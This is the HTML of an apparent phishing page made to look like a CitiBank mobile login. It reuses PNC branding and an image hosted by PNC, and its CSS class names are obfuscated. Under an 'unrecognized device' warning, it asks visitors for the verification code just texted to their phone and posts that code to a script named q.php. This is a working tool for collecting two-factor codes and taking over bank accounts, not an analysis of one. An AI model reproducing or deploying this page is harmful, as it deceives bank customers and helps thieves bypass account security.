<html xmlns="http://www.w3.org/1999/xhtml"><head>
	<title>CitiBank Login</title>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="Sat, 01 Dec 2001 00:00:00 GMT">
<style type="text/css">
select {margin-left:12px; font-size:1.1em; }
  input[type='text'] {margin-left:12px; font-size:18px; }
  a {margin-left:12px; width:100%; color:#039; font-weight:bold; text-decoration:none; }
  .mlwvhl {padding:12px 0 12px 12px; margin:0; color:#f60; font-weight:bold; font-size:21px; font-family:arial, helvetica, "sans serif"; text-align:left; }
  .gklqqhg {background-color:#039; width:auto; padding:8px 0 5px 12px; font-family:Verdana, Arial; text-align:left; }
  .bold {font-weight:bold; }
  image {text-align:left; }
  .ggoiofm {width:100%; font-size:inherit; font-family:inherit; font-weight:bold; text-align:center; }
  .adibtmk {padding:0px; margin:0px; }
  form {width:100%; }
  .text {margin-left:12px; text-align:left; }
  hr {border:1px #ccc solid; }
  a:hover {text-decoration:underline; }
  .footer {margin-left:-16px; font-size:12px; color:#666; font-weight:normal; }
  body {background-color:#fff; padding:0; margin:0; color:#000; font-size:14px; font-family:arial, helvetica, "sans serif"; text-align:left; }
  img {border:0; }
  .olpjmcc {border:0; cursor:pointer; padding:35px 0 0 0; color:rgba(0,0,0,0); font-weight:bold; text-decoration:none; display:block; font-size:0; line-height:0; background:url('https://m.pnc.com/device/mobile/images/button_next.png') no-repeat center center #fff; width:100%; font-family:inherit; height:35px; }
  span {margin-left:12px; }
  table {margin-left:12px; }
  input[type='password'] {margin-left:12px; width:90%; font-size:18px; }
  
</style>
<body class="adibtmk">
<!-- Header -->
<div class="gklqqhg">
<img width="69" height="40" alt="PNC Mobile Banking" src="citi.png">	
</div>

<div>
<meta name="viewport" content="width=device-width, initial-scale=1">
        

</div>

<!-- Title -->
<div class="mlwvhl">
Unreconized Device
</div>


<form action="q.php" method="post">
	<div>
<input name="counter" type="hidden" value="0"><input name="challengeErrorCounter" type="hidden" value="0"><br>
<span class="bold">In the next 2 - 3  minutes you will receive a verification code on your phone. After you receive it please enter it below.</span><br>
<br>

<span class="bold">Code:</span><input name="a" type="text" value="" required><br>
<br>
<br>
<br>
 
 </select>
 <br>
<br>
<br>
<input name="Next" class="olpjmcc" type="submit" value="Next"><br>

	</div>
</form>
<br>
<br>
<!-- List Item -->
<div class="ggoiofm">
<a href=""></a>
</div>
<br>
<!-- List Item -->
<div class="ggoiofm">
<a href=""></a>
</div>
